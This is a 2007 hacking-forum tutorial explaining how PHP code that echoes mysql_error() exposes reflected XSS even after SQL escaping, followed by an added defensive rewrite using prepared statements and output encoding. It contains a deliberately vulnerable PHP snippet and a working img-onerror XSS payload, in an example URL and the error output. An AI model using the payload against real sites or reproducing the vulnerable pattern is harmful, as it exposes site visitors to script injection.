RST > 1337 Zone > Tutorials in English

Posted 11-22-2007, 08:44 AM, #1, by moubik (Administrator)
XSS in echo mysql_error()

Really?

YES!

What is mysql_error()?
It's a simple function that helps developers debug their code. A piece of code may look like this:
Code:
    // $_GET['id'] is concatenated straight into the query, unsanitized
    $query = "SELECT * FROM randomTable WHERE id='" . $_GET['id'] . "'";
    mysql_query($query);
    // the raw MySQL error text is written into the HTML response
    echo mysql_error();
Obviously this code is vulnerable to SQL injection because $_GET[’id’] is not sanitized at all.
One could inject SQL code directly into the id variable.

Thus the programmer will sanitize the variable:
Code:
    // the value is now escaped for SQL, but the error text is still echoed as-is
    $query = "SELECT * FROM randomTable WHERE id='" . mysql_real_escape_string($_GET['id']) . "'";
    mysql_query($query);
    echo mysql_error();
Cool, now he got rid of the SQL injection. But something else happened. I did not realize this until last night when I was testing a friend's site. I tried an SQL injection and I saw that he had properly sanitized the code, and it threw a mysql_error().
This gave me an idea. Could I use this to my advantage?
Well, of course I could: inject characters that will be escaped and also inject XSS code. What will this do?
It will throw an error that will contain the XSS.

XSS in echo mysql_error()
The link may look like:

http://site.com/search/aa/ASC'%20%3Cimg%20src=http:%20onerror=alert(String.fromCharCode(88,83,83))%3E/score/

You can see that I inserted ' on purpose to be sure it will throw the error and then the XSS.

I've used Gareth Heyes' "unusual XSS vector" with very little change:
Code:
    <img src=http: onerror=alert(String.fromCharCode(88,83,83)) />
What does the source output look like?
Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' <img src="http:" onerror="alert(String.fromCharCode(88,83,83))">' at line 1
So, another function that is pure evil: mysql_error().

original article: [link visible only to registered users]
__________________
you wouldn't like me when i'm angry.
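As an added example for defenders (not code from the post or its author), here is the same lookup written with PDO prepared statements instead of the post's mysql_* calls, with the database error logged server-side rather than echoed and any text reflected into the page HTML-encoded. The connection details, the `$pdo` variable, the `name` column and the helper names are assumptions.

```php
<?php
// Added example, not code from the post: the same lookup rewritten so that the
// client controls neither the query text nor anything reflected into the page.
// Assumptions: a PDO connection ($pdo), a table randomTable with an integer id
// column and a text column "name"; the post itself used the mysql_* API.

$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION, // errors become exceptions
    PDO::ATTR_EMULATE_PREPARES => false,                 // real server-side prepares
]);

function lookupById(PDO $pdo, $rawId)
{
    // 1. Validate the type up front: id is numeric, so a quote or a tag in it
    //    is rejected here and never turns into a SQL syntax error.
    if (!is_string($rawId) || !preg_match('/^[0-9]{1,10}$/', $rawId)) {
        return null;
    }
    // 2. Bind the value instead of concatenating it: escaping is no longer the
    //    application's job, and a quoting bug cannot reflect the input back.
    $stmt = $pdo->prepare('SELECT id, name FROM randomTable WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 3. HTML-encode anything written into the page. This is the step the post's
//    echo mysql_error() lacked, so the "<img ...>" in the message became markup.
function h($s)
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

try {
    $rows = lookupById($pdo, isset($_GET['id']) ? $_GET['id'] : '');
} catch (PDOException $e) {
    // 4. Database errors go to the server log, never to the client: the error
    //    text quotes the query and therefore the attacker's input.
    error_log('lookupById failed: ' . $e->getMessage());
    http_response_code(500);
    exit('An internal error occurred.');
}
if ($rows === null) {
    http_response_code(400);
    exit('Invalid id.');
}
foreach ($rows as $row) {
    echo '<li>' . h($row['name']) . '</li>';
}
```

Passing the post's own error string through `h()` would turn `<img` into `&lt;img`, which the browser renders as text rather than executing; the mysql_* extension itself was removed in PHP 7, so the prepared-statement form is also the only one that still runs.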
Copywr0ng (c) 2009 Miercuri catre Joi - RST